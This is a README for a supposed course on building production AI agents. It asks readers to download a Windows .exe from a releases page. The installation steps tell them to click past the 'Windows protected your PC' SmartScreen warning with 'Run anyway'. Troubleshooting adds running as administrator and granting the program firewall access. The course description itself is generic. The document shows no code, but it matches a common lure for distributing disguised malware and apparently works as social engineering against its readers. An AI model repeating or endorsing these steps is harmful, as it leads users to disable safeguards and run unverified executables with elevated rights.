🤖 agentic-ai-system-course - Learn to build production AI agents

This repository provides a step-by-step course on how to design, build, and operate production AI agents. AI agents act as digital employees that can complete tasks, reason through problems, and use external software. This guide helps you set up the tools to learn these skills.

🛠️ System Requirements

Your computer needs specific components to run this software. Please verify your system meets these standards:

  • Operating System: Windows 10 or Windows 11.
  • Processor: A modern multi-core processor from Intel or AMD.
  • Memory: At least 8GB of RAM.
  • Storage: 2GB of free disk space.
  • Internet: A stable connection for downloading dependencies.

📥 Getting the Application

Follow these steps to obtain the course software:

  1. Visit the releases page to download the package.
  2. Select the file ending in .exe for Windows.
  3. Save the file to your desktop or downloads folder.

⚙️ Installation Instructions

The software packages everything you need to run the course locally. Follow this sequence to prepare your system:

  1. Locate the downloaded file on your computer.
  2. Double-click the file to start the installer.
  3. Windows may show a security prompt labeled "Windows protected your PC." Click "More info" and then "Run anyway."
  4. Follow the on-screen prompts.
  5. Select your desired destination folder. The default suggestion works for most users.
  6. Check the box to "Create desktop shortcut" to make finding the application easier later.
  7. Click "Install" and wait for the status bar to finish.

🚀 Running the Course

Once installation finishes, you can start the application:

  1. Open the application using the icon on your desktop or the shortcut in your Start menu.
  2. The software launches a local interface within your primary web browser. This interface connects to the local agentic engine.
  3. If the browser does not open automatically, look for an icon in your system tray near the clock. Right-click the icon and select "Open Dashboard."

📚 Course Overview

The agentic-ai-system-course teaches you the core pillars of AI development. Each module contains lessons, exercises, and code skeletons.

Module 1: The Agentic Workflow

Agents differ from simple chatbots because they plan and execute actions. You will learn how to break down complex goals into smaller tasks.

Module 2: System Architecture

Production agents require robust designs. You will learn how to connect internal reasoning engines to external databases and website tools.

Module 3: Operating AI Agents

Building the agent is only the first step. This module covers monitoring, managing costs, and ensuring your agent performs tasks reliably.

🧩 Troubleshooting Common Issues

If the software fails to launch, review these common solutions:

  • Permission Errors: If the application cannot start, right-click the shortcut and select "Run as administrator."
  • Browser Issues: The dashboard functions best in Google Chrome, Microsoft Edge, or Mozilla Firefox. If the page appears blank, clear your browser cache or try an alternative browser.
  • Network Conflicts: Some security software blocks local network requests. If your firewall asks for permission, grant access to the application to allow the engine to communicate with the user interface.
  • Memory Usage: If the system runs slow, close other programs before starting the course material. AI tools require significant processing power, so keeping background tasks to a minimum helps improve performance.

💡 Learning Resources

The course materials include embedded documentation to assist you as you learn. Use the "Help" tab within the application to access the following:

  • Glossary of terms: Simple definitions for project vocabulary.
  • Video guides: Visual walkthroughs for complex labs.
  • Exercise files: Pre-configured templates to practice building your first agents.

You can return to the official releases page periodically to check for software updates. The development team releases new modules and course improvements as the field of AI agents evolves. Keeping your software current ensures you use the latest tools and security patches.
